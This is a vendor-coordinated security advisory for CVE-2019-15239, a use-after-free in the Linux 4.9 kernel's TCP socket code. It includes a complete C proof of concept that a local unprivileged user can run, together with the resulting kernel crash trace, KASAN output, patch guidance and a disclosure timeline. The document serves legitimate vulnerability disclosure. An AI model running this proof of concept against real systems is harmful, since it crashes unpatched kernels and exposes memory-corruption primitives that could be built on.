A use-after-free condition was present in the Linux 4.9 kernel TCP socket handling code, triggerable by a low privilege local user. The included POC triggers multiple read and write UAF conditions. Additionally, the POC causes a kernel crash on a vanilla Debian build.
Date Released: 14/08/2019
Author: Denis Andzakovic
Vendor Website: https://www.debian.org/
Affected Software: Linux Kernel 4.9.168
CVE: CVE-2019-15239
Proof-of-Concept
By adding to a write queue between disconnection and reconnection, multipe use-after-free conditions can be triggered. The following POC can be used to replicate the issue. The POC should be run multiple times over to reliably trigger the condition, for example: for i in {1..1000}; do ./repro; done
#define _GNU_SOURCE
#include <endian.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>
static void sleep_ms(uint64_t ms)
{
usleep(ms * 1000);
}
static uint64_t current_time_ms(void)
{
struct timespec ts;
if (clock_gettime(CLOCK_MONOTONIC, &ts))
exit(1);
return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000;
}
static void thread_start(void* (*fn)(void*), void* arg)
{
pthread_t th;
pthread_attr_t attr;
pthread_attr_init(&attr);
pthread_attr_setstacksize(&attr, 128 << 10);
if (pthread_create(&th, &attr, fn, arg))
exit(1);
pthread_attr_destroy(&attr);
}
typedef struct {
int state;
} event_t;
static void event_init(event_t* ev)
{
ev->state = 0;
}
static void event_reset(event_t* ev)
{
ev->state = 0;
}
static void event_set(event_t* ev)
{
if (ev->state)
exit(1);
__atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG);
}
static void event_wait(event_t* ev)
{
while (!__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
}
static int event_isset(event_t* ev)
{
return __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
}
static int event_timedwait(event_t* ev, uint64_t timeout)
{
uint64_t start = current_time_ms();
uint64_t now = start;
for (;;) {
uint64_t remain = timeout - (now - start);
struct timespec ts;
ts.tv_sec = remain / 1000;
ts.tv_nsec = (remain % 1000) * 1000 * 1000;
syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
if (__atomic_load_n(&ev->state, __ATOMIC_RELAXED))
return 1;
now = current_time_ms();
if (now - start > timeout)
return 0;
}
}
struct thread_t {
int created, call;
event_t ready, done;
};
static struct thread_t threads[16];
static void execute_call(int call);
static int running;
static void* thr(void* arg)
{
struct thread_t* th = (struct thread_t*)arg;
for (;;) {
event_wait(&th->ready);
event_reset(&th->ready);
execute_call(th->call);
__atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
event_set(&th->done);
}
return 0;
}
static void loop(void)
{
int i, call, thread;
for (call = 0; call < 8; call++) {
for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0]));
thread++) {
struct thread_t* th = &threads[thread];
if (!th->created) {
th->created = 1;
event_init(&th->ready);
event_init(&th->done);
event_set(&th->done);
thread_start(thr, th);
}
if (!event_isset(&th->done))
continue;
event_reset(&th->done);
th->call = call;
__atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
event_set(&th->ready);
event_timedwait(&th->done, 45);
break;
}
}
for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++)
sleep_ms(1);
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void execute_call(int call)
{
long res;
switch (call) {
case 0:
res = socket(2, 1, 0);
if (res != -1)
r[0] = res;
break;
case 1:
*(uint16_t*)0x20000000 = 2;
*(uint16_t*)0x20000002 = htobe16(0x4e23);
*(uint32_t*)0x20000004 = htobe32(0xe0000001);
bind(r[0], (void *)0x20000000, 0x10);
break;
case 2:
*(uint16_t*)0x20000200 = 2;
*(uint16_t*)0x20000202 = htobe16(0x4e23);
*(uint32_t*)0x20000204 = htobe32(0);
connect(r[0], (void *)0x20000200, 0x1c);
break;
case 3:
res = dup2(r[0], r[0]);
if (res != -1)
r[1] = res;
break;
case 4:
*(uint32_t*)0x200002c0 = 0x18;
*(uint32_t*)0x200002c4 = 0;
*(uint64_t*)0x200002c8 = 2;
*(uint32_t*)0x200002d0 = 0;
*(uint32_t*)0x200002d4 = 0;
write(r[1], (void *)0x200002c0, 0xfffffc1a);
break;
case 5:
*(uint64_t*)0x20005840 = 0;
*(uint32_t*)0x20005848 = 0;
*(uint64_t*)0x20005850 = 0x20005780;
*(uint64_t*)0x20005780 = 0x20000480;
*(uint32_t*)0x20000480 = 0x18;
*(uint16_t*)0x20000484 = 0xfff9;
*(uint16_t*)0x20000486 = 0x300;
*(uint32_t*)0x20000488 = 0x70bd27;
*(uint32_t*)0x2000048c = 0x25dfdbfc;
*(uint16_t*)0x20000490 = 8;
*(uint16_t*)0x20000492 = 0x72;
*(uint32_t*)0x20000494 = 0;
*(uint64_t*)0x20005788 = 0x18;
*(uint64_t*)0x20005790 = 0;
*(uint64_t*)0x20005798 = 0;
*(uint64_t*)0x200057a0 = 0;
*(uint64_t*)0x200057a8 = 0;
*(uint64_t*)0x200057b0 = 0;
*(uint64_t*)0x200057b8 = 0;
*(uint64_t*)0x200057c0 = 0;
*(uint64_t*)0x200057c8 = 0;
*(uint64_t*)0x200057d0 = 0;
*(uint64_t*)0x200057d8 = 0;
*(uint64_t*)0x200057e0 = 0;
*(uint64_t*)0x200057e8 = 0;
*(uint64_t*)0x20005858 = 7;
*(uint64_t*)0x20005860 = 0;
*(uint64_t*)0x20005868 = 0;
*(uint32_t*)0x20005870 = 0x40000;
sendmsg(r[1], (void *)0x20005840, 1);
break;
case 6:
*(uint16_t*)0x20000180 = 0;
memcpy(
(void*)0x20000182,
"./"
"file0\x00",
6);
connect(r[1], (void *)0x20000180, 0x8);
break;
case 7:
*(uint16_t*)0x20000140 = 2;
*(uint16_t*)0x20000142 = htobe16(0x4e23);
*(uint32_t*)0x20000144 = htobe32(0x7f000001);
connect(r[0], (void *)0x20000140, 0x10);
break;
}
}
int main(void)
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
printf("My process ID : %d\n", getpid());
loop();
return 0;
}
A successful run of the POC above produces the following kernel crash:
[ 65.706537] BUG: unable to handle kernel NULL pointer dereference at 0000000000000008
[ 65.707195] IP: [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.707804] PGD 0
[ 65.708434] Oops: 0002 [#1] SMP
[ 65.709079] Modules linked in: iptable_filter fuse crct10dif_pclmul crc32_pclmul vmw_balloon ghash_clmulni_intel joydev serio_raw pcspkr vmw_vmci snd_ens1371 snd_ac97_codec ac97_bus gameport snd_rawmidi snd_seq_device snd_pcm snd_timer snd soundcore shpchp evdev vmwgfx ttm drm_kms_helper drm sg ac button btusb btrtl btbcm btintel bluetooth rfkill ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sr_mod cdrom sd_mod ata_generic hid_generic usbhid hid crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd psmouse ata_piix ehci_pci e1000 uhci_hcd ehci_hcd usbcore usb_common mptspi scsi_transport_spi mptscsih mptbase i2c_piix4 libata scsi_mod
[ 65.714663] CPU: 0 PID: 612 Comm: repro Not tainted 4.9.0-9-amd64 #1 Debian 4.9.168-1
[ 65.715408] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/19/2017
[ 65.716911] task: ffff880016bc90c0 task.stack: ffffc90000974000
[ 65.717645] RIP: 0010:[<ffffffff815702c1>] [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.718405] RSP: 0018:ffffc90000977b68 EFLAGS: 00010286
[ 65.719996] RAX: 0000000000000000 RBX: ffff8800197ec600 RCX: 0000000000000001
[ 65.722660] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[ 65.727010] RBP: ffff8800197ec800 R08: 000000000000ffd7 R09: 0000000000000002
[ 65.727756] R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000
[ 65.728507] R13: ffff880013771040 R14: 0000000000007fff R15: 0000000000007fff
[ 65.729243] FS: 0000000000000000(0000) GS:ffff88001ba00000(0000) knlGS:0000000000000000
[ 65.729939] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 65.730554] CR2: 0000000000000008 CR3: 0000000001c08000 CR4: 0000000000360670
[ 65.731224] Stack:
[ 65.731852] 0000000000000000 0000000000007fff ffff8800197ec600 0000000000000001
[ 65.732469] 0000000000000000 ffff880013771040 ffffffff81571a66 ffff880013771170
[ 65.733098] 0000000002080020 0000000000000002 00007ffe00000001 0000000000000000
[ 65.733719] Call Trace:
[ 65.734351] [<ffffffff81571a66>] ? tcp_write_xmit+0x676/0xfc0
[ 65.734967] [<ffffffff815723dd>] ? __tcp_push_pending_frames+0x2d/0xd0
[ 65.735526] [<ffffffff81564bae>] ? tcp_close+0x3fe/0x450
[ 65.736093] [<ffffffff8158e58c>] ? inet_release+0x3c/0x60
[ 65.736637] [<ffffffff814f2800>] ? sock_release+0x20/0x80
[ 65.737208] [<ffffffff814f286e>] ? sock_close+0xe/0x20
[ 65.737741] [<ffffffff8120dc48>] ? __fput+0xd8/0x220
[ 65.738280] [<ffffffff81098d5f>] ? task_work_run+0x7f/0xa0
[ 65.738847] [<ffffffff8107ed64>] ? do_exit+0x2d4/0xb60
[ 65.739403] [<ffffffff814f8003>] ? release_sock+0x43/0x90
[ 65.739994] [<ffffffff8156408f>] ? tcp_sendmsg+0x65f/0xc40
[ 65.740504] [<ffffffff8107f66a>] ? do_group_exit+0x3a/0xa0
[ 65.741131] [<ffffffff8108a5fc>] ? get_signal+0x15c/0x7f0
[ 65.741676] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.742209] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.742652] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.743265] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.743726] [<ffffffff81026456>] ? do_signal+0x36/0x6a0
[ 65.744135] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.744520] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.744952] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.745336] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.745666] [<ffffffff8102568f>] ? __switch_to+0x1ef/0x660
[ 65.746061] [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[ 65.746367] [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[ 65.746683] [<ffffffff81615aa1>] ? __schedule+0x241/0x6f0
[ 65.747035] [<ffffffff8120bb74>] ? vfs_write+0x144/0x190
[ 65.747349] [<ffffffff81003721>] ? exit_to_usermode_loop+0x71/0xb0
[ 65.747654] [<ffffffff81003bcd>] ? do_syscall_64+0xdd/0xf0
[ 65.748012] [<ffffffff8161a84e>] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
[ 65.748310] Code: 00 00 8b 85 cc 00 00 00 80 8d 8e 00 00 00 02 48 03 85 d0 00 00 00 c7 40 20 01 00 01 00 48 8b 03 48 89 5d 08 48 89 45 00 48 89 2b <48> 89 68 08 41 83 85 40 01 00 00 01 31 c0 5b 5d 41 5c 41 5d 41
[ 65.749362] RIP [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[ 65.749672] RSP <ffffc90000977b68>
[ 65.750076] CR2: 0000000000000008
[ 65.750374] ---[ end trace 7d15bf5730d84780 ]---
[ 65.750670] Fixing recursive fault but reboot is needed!
Additionally, the POC produced the following KASAN output. Note, all of the following lines stem from a single successful execution of the POC.
BUG: KASAN: use-after-free in ip_queue_xmit+0x50b/0x750 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x1b/0x80 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x3b/0x80 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x4e/0x80 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x9f/0x750 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xba/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xdd/0x750 at addr ffff8801eb449bac - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x118/0x750 at addr ffff8801f46be37c - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3e6/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3fd/0x750 at addr ffff8801f46be382 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x180/0x750 at addr ffff8801f46be384 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1aa/0x750 at addr ffff8801f46be385 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1da/0x750 at addr ffff8801f46be388 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x20b/0x750 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x21c/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x22f/0x750 at addr ffff8801f46be944 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x24a/0x750 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x25e/0x750 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x272/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2b5/0x750 at addr ffff8801f46be380 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2f8/0x750 at addr ffff8801eb449b84 - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x31e/0x750 at addr ffff8801eb449b9c - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x79/0x270 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x8d/0x270 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xa0/0x270 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xb2/0x270 at addr ffff8801f46be37e - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x12/0x60 at addr ffff8801f46be386 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x20/0x60 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xce/0x270 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x116/0x270 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_local_out+0x27/0x60 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0x76/0x1c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xb2/0x1c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xc7/0x1c0 at addr ffff8801eb449b08 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xd7/0x1c0 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xec/0x1c0 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x25/0x310 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x206/0x310 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0xf7/0x310 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x109/0x310 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x119/0x310 at addr ffff8801f46be942 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x130/0x310 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x25/0xf0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x38/0xf0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x48/0xf0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x5a/0xf0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xaa/0x7c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xd7/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xf3/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x117/0x7c0 at addr ffff8801eb449bb0 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x13b/0x7c0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x173/0x7c0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x1d9/0x7c0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x6b4/0x7c0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x360/0x7c0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_options_echo+0x33/0x670 at addr ffff8801eb449b1c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x573/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x585/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x598/0x7c0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x5f1/0x7c0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x2cb/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x14d/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x18e/0x5a0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1a4/0x5a0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1bc/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1cc/0x5a0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x28/0x7b0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x3e/0x7b0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x52/0x7b0 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x67/0x7b0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xc5/0x7b0 at addr ffff8801eb449b9c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xf5/0x7b0 at addr ffff8801eb449b88 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x116/0x7b0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x13a/0x7b0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x4c1/0x7b0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x684/0x7b0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x699/0x7b0 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x502/0x7b0 at addr ffff8801f46be392 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x523/0x7b0 at addr ffff8801f46be390 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x1ed/0x7b0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x207/0x7b0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x288/0x7b0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x35a/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x738/0x7c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x2d/0x400 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x40/0x400 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x6e/0x400 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in nf_ct_attach+0x16/0x40 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skb+0x23/0xd0 at addr ffff8801eb449bcc - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x16/0xf0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x31/0xf0 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x42/0xf0 at addr ffff8801eb449b50 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x61/0xf0 at addr ffff8801eb449b48 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x17/0xe0 at addr ffff8801eb449b00 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_wfree+0x27/0xe0 at addr ffff8801eb449bc8 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x8a/0xf0 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0xa6/0xf0 at addr ffff8801eb449b60 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_all+0x1a/0x30 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x1a/0x140 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x2d/0x140 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_data+0x40/0x140 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skbmem+0x15/0x80 at addr ffff8801eb449b76 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_init_tso_segs+0x1e/0xc0 at addr ffff8801eb449a30 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in tcp_write_xmit+0x51b/0x1d50 at addr ffff8801eb449a34 - Read of size 1 by task rep/29723
Recommendation
This bug was introduced by backports of commit 7f582b248d0a (“tcp: purge write queue in tcp_connect_init()”). Apply security updates included with DSA 4497-1.
The vulnerability has been addressed in Debian 3.16.72-1, 4.9.168-1+deb9u5~deb8u1 and 4.9.168-1+deb9u5.
The fix should be included in the upcoming stable releases:
- 3.16.73
- 4.4.190
- 4.9.190
- 4.14.139
Timeline
21/05/2019 - Initial email to Debian security team
26/05/2019 - Debian security team identified a potential patch
06/08/2019 - Patch file recieved from Debian, confirming a fix
14/08/2019 - Advisory released